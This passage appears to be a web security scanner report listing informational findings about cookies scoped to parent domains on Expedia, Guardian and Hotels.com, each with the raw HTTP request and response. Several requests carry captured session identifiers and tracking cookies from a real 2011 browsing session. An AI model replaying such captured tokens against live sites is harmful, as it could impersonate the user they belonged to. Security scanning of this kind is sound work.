
<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
13.154. http://www.expedia.com/TripPreferences  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /TripPreferences

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`user=v.8,0,EX010F7C6DCC$F1$88001000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; p1=`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Content-Type: text/HTML;charset=UTF-8
Content-Length: 0
Date: Mon, 03 Oct 2011 01:07:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/

13.155. http://www.expedia.com/daily/common/mscookie.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/common/mscookie.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/common/mscookie.aspx?PDEST=BOS HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 96
Content-Length: 96
Date: Mon, 03 Oct 2011 00:10:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaCookie=0`1034,1004,PDEST,BOS; domain=.expedia.com; expires=Tue, 31-Jan-2012 01:10:59 GMT; path=/


<!--V. 1.8 5/6/2010-->
<html>
<head>
<title></title>

</head>
<body>

</body>
</html>
13.156. http://www.expedia.com/pubspec/scripts/eap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US.. HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: /Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&&chkin=10/14/11&chkout=10/16/11&rm1=a2&icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&eapid=21187-1
Content-Length: 383
Content-Type: text/html
Cache-Control: private
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: p1=`tpid=v.1,1`11; expires=Sun, 2-Oct-2016 00:00:01 GMT; domain=.expedia.com; path=/
Set-Cookie: iEAPID=21187; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&amp;&amp;chkin=10/14/11&amp;chkout=10/16/11
...[SNIP]...
13.157. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
13.158. http://www.hotels.com/PPCHotelDetails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCHotelDetails

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCHotelDetails?hotelid=205543&arrivalDate=14/10/2011&departureDate=16/10/2011&adultsPerRoom=2&numberOfRooms=1&view=rates&PRSC=TAJ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSLB=1; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMDMuNC4xLmk2OjE3MS4xLjA6MTMwLjEuMS5pMjo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6Mi4yLjE6MTk2LjEuMDoyMDkuMC4xOjE0Ny4wLjEuaTY6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjE5NS4wLjA6MTA0LjAuMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Location: http://www.hotels.com/hotel/details.html?tab=prices&destinationId=1401516&destination=Boston%2C+Massachusetts%2C+United+States&hotelId=205543&arrivalDate=10-14-11&departureDate=10-16-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:16 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:16 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuNi4wLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:16 GMT; Path=/

13.159. http://www.hotels.com/PPCSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCSearch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PPCSearch?city=Boston,&arrivalDate=04/10/2011&adultsPerRoom=2&numberOfRooms=1&departureDate=07/10/2011 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Location: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:09:56 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/

13.160. http://www.hotels.com/compare/hotel_dockingbar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-691979445 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 3650
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 3650
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:09 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n
...[SNIP]...
13.161. http://www.hotels.com/hotel/details.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
